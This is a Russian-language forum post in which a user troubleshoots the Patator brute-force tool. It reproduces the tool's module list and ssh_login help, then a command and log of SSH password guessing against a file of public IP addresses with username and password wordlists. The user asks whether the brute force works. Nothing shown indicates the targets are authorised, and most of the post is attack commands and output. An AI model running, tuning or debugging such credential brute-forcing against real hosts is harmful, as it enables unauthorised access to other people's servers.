Версии pycurl и libcurl какие установлены?
Судя по чейнджлогу, PROXYTYPE_SOCKS4A появился в версии 7.19.5.1, которой требуется libcurl >= 7.19.0
0.6 версия не капризная как 0.7. Запустилась 6 версия
--------------------------
$ python patator.py
Patator v0.6 (
Ссылка скрыта от гостей
)
Usage: patator.py module --help
Available modules:
+ ftp_login : Brute-force FTP
+ ssh_login : Brute-force SSH
+ telnet_login : Brute-force Telnet
+ smtp_login : Brute-force SMTP
+ smtp_vrfy : Enumerate valid users using SMTP VRFY
+ smtp_rcpt : Enumerate valid users using SMTP RCPT TO
+ finger_lookup : Enumerate valid users using Finger
+ http_fuzz : Brute-force HTTP
+ pop_login : Brute-force POP3
+ pop_passd : Brute-force poppassd (
Ссылка скрыта от гостей
)
+ imap_login : Brute-force IMAP4
+ ldap_login : Brute-force LDAP
+ smb_login : Brute-force SMB
+ smb_lookupsid : Brute-force SMB SID-lookup
+ rlogin_login : Brute-force rlogin
+ vmauthd_login : Brute-force VMware Authentication Daemon
+ mssql_login : Brute-force MSSQL
+ oracle_login : Brute-force Oracle
+ mysql_login : Brute-force MySQL
+ mysql_query : Brute-force MySQL queries
+ pgsql_login : Brute-force PostgreSQL
+ vnc_login : Brute-force VNC
+ dns_forward : Forward lookup names
+ dns_reverse : Reverse lookup subnets
+ snmp_login : Brute-force SNMP v1/2/3
+ unzip_pass : Brute-force the password of encrypted ZIP files
+ keystore_pass : Brute-force the password of Java keystore files
+ umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
+ tcp_fuzz : Fuzz TCP services
+ dummy_test : Testing module
david@connectomix-second:~/patator$ patator.py ssh_login --help
-bash: patator.py: command not found
david@connectomix-second:~/patator$ ./ patator.py ssh_login --help
-bash: ./: Is a directory
david@connectomix-second:~/patator$ ./patator.py ssh_login --help
-bash: ./patator.py: Permission denied
david@connectomix-second:~/patator$ python patator.py ssh_login --help
Patator v0.6 (
Ссылка скрыта от гостей
)
Usage: ssh_login <module-options ...> [global-options ...]
Examples:
ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'
Module options:
host : target host
port : target port [22]
user : usernames to test
password : passwords to test
auth_type : auth type to use [password|keyboard-interactive]
persistent : use persistent connections [1|0]
Global options:
--version show program's version number and exit
-h, --help show this help message and exit
Execution:
-x arg actions and conditions, see Syntax below
--start=N start from offset N in the wordlist product
--stop=N stop at offset N
--resume=r1[,rN]* resume previous run
-e arg encode everything between two tags, see Syntax below
-C str delimiter string in combo files (default is ':')
-X str delimiter string in conditions (default is ',')
Optimization:
--rate-limit=N wait N seconds between tests (default is 0)
--max-retries=N skip payload after N failures (default is 4) (-1 for
unlimited)
-t N, --threads=N number of threads (default is 10)
Logging:
-l DIR save output and response data into DIR
-L SFX automatically save into DIR/yyyy-mm-dd/hh:mm:ss_SFX
(DIR defaults to '/tmp/patator')
Debugging:
-d, --debug enable debug messages
Syntax:
-x actions:conditions
actions := action[,action]*
action := "ignore" | "retry" | "free" | "quit" | "reset"
conditions := condition=value[,condition=value]*
condition := "code" | "size" | "time" | "mesg" | "fgrep" | "egrep"
ignore : do not report
retry : try payload again
free : dismiss future similar payloads
quit : terminate execution now
reset : close current connection in order to reconnect next time
code : match status code
size : match size (N or N-M or N- or -N)
time : match time (N or N-M or N- or -N)
mesg : match message
fgrep : search for string in mesg
egrep : search for regex in mesg
For example, to ignore all redirects to the home page:
... -x ignore:code=302,fgrep='Location: /home.html'
-e tag:encoding
tag := any unique string (eg. T@G or _@@_ or ...)
encoding := "url" | "sha1" | "md5" | "hex" | "b64"
url : url encode
sha1 : hash in sha1
md5 : hash in md5
hex : encode in hexadecimal
b64 : encode in base64
For example, to encode every password in base64:
... host=10.0.0.1 user=admin password=_@@_FILE0_@@_ -e _@@_:b64
Please read the README inside for more examples and usage information.
---------------------------------------------------
При запуске SSH брута тоже ругается на этот путь: /usr/lib/python2.7/
$ cd patator
david@connectomix-second:~/patator$ python patator.py ssh_login host=FILE0 0=/home/david/ip.txt user=FILE1 1=/home/david/user.txt password=FILE2 2=/home/david/pass.txt
16:24:18 patator INFO - Starting Patator v0.6 (
Ссылка скрыта от гостей
) at 2018-01-17 16:24 EST
16:24:18 patator INFO -
16:24:18 patator INFO - code size time | candidate | num | mesg
16:24:18 patator INFO - -----------------------------------------------------------------------------
/usr/lib/python2.7/dist-packages/Crypto/Cipher/blockalgo.py:141: FutureWarning: CTR mode needs counter parameter, not IV
self._cipher = factory.new(key, *args, **kwargs)
16:24:21 patator INFO - 1 22 2.704 | 162.144.92.81:user:michael | 2 | Authentication failed.
16:24:21 patator INFO - 1 22 2.768 | 162.144.92.81:user:maria | 4 | Authentication failed.
16:24:21 patator INFO - 1 22 2.712 | 162.144.92.81:user:john | 5 | Authentication failed.
16:24:21 patator INFO - 1 22 2.704 | 162.144.92.81:user:jose | 6 | Authentication failed.
16:24:21 patator INFO - 1 22 2.667 | 162.144.92.81:user:james | 7 | Authentication failed.
16:24:55 patator INFO - 0 24 0.132 | 67.252.134.226:user:michael | 154 | SSH-2.0-dropbear_2015.67
16:24:56 patator FAIL - xxx 70 0.000 | 67.252.134.226:user:maria | 156 | <class 'paramiko.SSHException'> ('Error reading SSH protocol banner',)
16:24:56 patator FAIL - xxx 70 0.000 | 67.252.134.226:user:james | 159 | <class 'paramiko.SSHException'> ('Error reading SSH protocol banner',)
--------------------------------
Но работает вроде. Настройки нужно изучать. Работает брут? или нет? Ответь плиз по обоим постам.
Спасибо тебе за потраченное на меня время.
P.S. По этой ошибки "ctr mode needs counter parameter not iv" разбираюсь пока.